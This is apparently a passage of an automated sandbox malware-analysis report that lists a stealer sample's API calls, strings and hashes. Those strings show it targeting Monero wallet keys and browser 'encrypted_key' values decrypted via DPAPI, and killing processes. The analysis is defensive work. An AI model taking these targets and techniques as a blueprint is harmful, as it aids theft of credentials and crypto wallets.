                              • Part of subcall function 000E8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000E8FE2
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,000F1678,000F0D93), ref: 000DF64C
                            • lstrlen.KERNEL32(00000000), ref: 000DF66B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 998311485-3310892237
                            • Opcode ID: fb39da2317c09763cc038aab055d70f2516e6d653d241ed046b6443c2cb36a41
                            • Instruction ID: 094ba0a3db90dcef070d517bd7bb2b881f550fbc2f6f38f4eb07e6995871ea05
                            • Opcode Fuzzy Hash: fb39da2317c09763cc038aab055d70f2516e6d653d241ed046b6443c2cb36a41
                            • Instruction Fuzzy Hash: 0C511972E002489ECB14FBA1DDA29FD7379AF59300F418568F51676193EF346A08CB62
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 69c4cc29a641c8ae9931ae991a413fc71b86f43f03f32875bc2c9e873dcf889e
                            • Instruction ID: 733b83a0e1b39db6ddf870557127dc95896e0a7593c8b00a1af157f521eea435
                            • Opcode Fuzzy Hash: 69c4cc29a641c8ae9931ae991a413fc71b86f43f03f32875bc2c9e873dcf889e
                            • Instruction Fuzzy Hash: C6416171E002499FCB04EFA5DD55AFEB778AF58304F008028F51677192EB70AA04CFA2
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000DA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000DA13C
                              • Part of subcall function 000DA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000DA161
                              • Part of subcall function 000DA110: LocalAlloc.KERNEL32(00000040,?), ref: 000DA181
                              • Part of subcall function 000DA110: ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000DA1AA
                              • Part of subcall function 000DA110: LocalFree.KERNEL32(000D148F), ref: 000DA1E0
                              • Part of subcall function 000DA110: CloseHandle.KERNEL32(000000FF), ref: 000DA1EA
                              • Part of subcall function 000E8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000E8FE2
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 000DA489
                              • Part of subcall function 000DA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 000DA23F
                              • Part of subcall function 000DA210: LocalAlloc.KERNEL32(00000040,?,?,?,000D4F3E,00000000,?), ref: 000DA251
                              • Part of subcall function 000DA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 000DA27A
                              • Part of subcall function 000DA210: LocalFree.KERNEL32(?,?,?,?,000D4F3E,00000000,?), ref: 000DA28F
                              • Part of subcall function 000DA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 000DA2D4
                              • Part of subcall function 000DA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 000DA2F3
                              • Part of subcall function 000DA2B0: LocalFree.KERNEL32(?), ref: 000DA323
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: 27d1b36ea51c462aa42d4923685ec3bb19c93dc2a1989b19d1436aa84923d882
                            • Instruction ID: 8487c54cd56d1cefc6bbee3645c36a252c94cb78591efde0e88e56574c59b104
                            • Opcode Fuzzy Hash: 27d1b36ea51c462aa42d4923685ec3bb19c93dc2a1989b19d1436aa84923d882
                            • Instruction Fuzzy Hash: F03143B6E0060DABCF04DFD4EC45AEFB7B8AF59304F044519E905A7246E7319A04CBB2
                            APIs
                            • memset.MSVCRT ref: 000E967B
                              • Part of subcall function 000E8EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,000E96AE,00000000), ref: 000E8EEB
                              • Part of subcall function 000E8EE0: RtlAllocateHeap.NTDLL(00000000), ref: 000E8EF2
                              • Part of subcall function 000E8EE0: wsprintfW.USER32 ref: 000E8F08
                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 000E973B
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 000E9759
                            • CloseHandle.KERNEL32(00000000), ref: 000E9766
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                            • String ID:
                            • API String ID: 3729781310-0
                            • Opcode ID: 1b6e03728731899f0e34010c84202182630c06f8144715f2c4a6e714143fafcb
                            • Instruction ID: 3e6e1c5aa7a27bae354fb16aabbd534a79b95dcdfa71fb21c7d46f2c2d8d3b04
                            • Opcode Fuzzy Hash: 1b6e03728731899f0e34010c84202182630c06f8144715f2c4a6e714143fafcb
                            • Instruction Fuzzy Hash: 55315875E04248EFDB14DFE1CD89BEDB7B8BB49700F104458F606AB285EB74AA48CB51
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,000F05BF), ref: 000E885A
                            • Process32First.KERNEL32(?,00000128), ref: 000E886E
                            • Process32Next.KERNEL32(?,00000128), ref: 000E8883
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                            • CloseHandle.KERNEL32(?), ref: 000E88F1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 8a8450d684c0dbdadfc92386ca01685541a870c2e390d707d4d6ae749e3b9c05
                            • Instruction ID: bf91fe15963f7231cbbf25d8eba3b991a6c5669b0fad15e5cb5ede11254b15be
                            • Opcode Fuzzy Hash: 8a8450d684c0dbdadfc92386ca01685541a870c2e390d707d4d6ae749e3b9c05
                            • Instruction Fuzzy Hash: 26315C71A01258AFCB25DF96CD51FEEB378EB4A700F104199F10EB61A2DB306A44CFA1
                            APIs
                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0014FE13
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0014FE2C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Value___vcrt_
                            • String ID:
                            • API String ID: 1426506684-0
                            • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                            • Instruction ID: bf19800c6ab2dca08c5ecdcc44a5b212a0b8e65f23fb39b4286eda9e47a502dd
                            • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                            • Instruction Fuzzy Hash: 9801D432109721FEF63526745CC9A6B3694EB117B7732433EF926A82F2EF528C469140
                            APIs
                            • CreateFileA.KERNEL32(000E3D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,000E3D3E,?), ref: 000E948C
                            • GetFileSizeEx.KERNEL32(000000FF,000E3D3E), ref: 000E94A9
                            • CloseHandle.KERNEL32(000000FF), ref: 000E94B7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID:
                            • API String ID: 1378416451-0
                            • Opcode ID: c6bacdcda77fb51165b46fd5508e44a06ee484dc7b21c8a7751bc55eed14a011
                            • Instruction ID: 093524c64b766cef87a0e18a579046d079adb1dfdc48aa5aed24307668a3f622
                            • Opcode Fuzzy Hash: c6bacdcda77fb51165b46fd5508e44a06ee484dc7b21c8a7751bc55eed14a011
                            • Instruction Fuzzy Hash: AFF04F79E44208BFDB10DFB1EC89F9E77F9AB48710F10C654FA11A72C0D67096018B80
                            APIs
                            • __getptd.LIBCMT ref: 000ECA7E
                              • Part of subcall function 000EC2A0: __amsg_exit.LIBCMT ref: 000EC2B0
                            • __getptd.LIBCMT ref: 000ECA95
                            • __amsg_exit.LIBCMT ref: 000ECAA3
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 000ECAC7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: 5424a08733268a65173ce103d3ab4b92ed6e08675097624ff91440261c4335d0
                            • Instruction ID: 1299d40d5fc5bd189a1c3ae69015ea8410f845d276901910ef956946d87b4655
                            • Opcode Fuzzy Hash: 5424a08733268a65173ce103d3ab4b92ed6e08675097624ff91440261c4335d0
                            • Instruction Fuzzy Hash: 41F0C2319442989FF620FBAA5803F9F33A0AF40718F18015DF1047A5D3CB255D429682
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Catch
                            • String ID: MOC$RCC
                            • API String ID: 78271584-2084237596
                            • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                            • Instruction ID: d9f242156691a9444b3eb530cf3f5d9ad341a9014d06c9989ab0b5912d562489
                            • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                            • Instruction Fuzzy Hash: 56415971900209EFCF16DF98DC81AEEBBB5BF48305F188199FD246A261E3359A54DF50
                            APIs
                              • Part of subcall function 000E8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000E8F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 000E51CA
                            • lstrcat.KERNEL32(?,000F1058), ref: 000E51E7
                            • lstrcat.KERNEL32(?,00D491F8), ref: 000E51FB
                            • lstrcat.KERNEL32(?,000F105C), ref: 000E520D
                              • Part of subcall function 000E4B60: wsprintfA.USER32 ref: 000E4B7C
                              • Part of subcall function 000E4B60: FindFirstFileA.KERNEL32(?,?), ref: 000E4B93
                              • Part of subcall function 000E4B60: StrCmpCA.SHLWAPI(?,000F0FC4), ref: 000E4BC1
                              • Part of subcall function 000E4B60: StrCmpCA.SHLWAPI(?,000F0FC8), ref: 000E4BD7
                              • Part of subcall function 000E4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 000E4DCD
                              • Part of subcall function 000E4B60: FindClose.KERNEL32(000000FF), ref: 000E4DE2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: a894ba662e29eae8c2a5feee5c7eb98ab0886fed5535398a83438d62ea703249
                            • Instruction ID: 0c034b01928da1b8894fb9c0f04347bd981aac015908d96b8168589df8b70850
                            • Opcode Fuzzy Hash: a894ba662e29eae8c2a5feee5c7eb98ab0886fed5535398a83438d62ea703249
                            • Instruction Fuzzy Hash: E321FC76A00208EFDB14FBB0EC87EED333C9B55300F004595B65956192EE749AC88FA1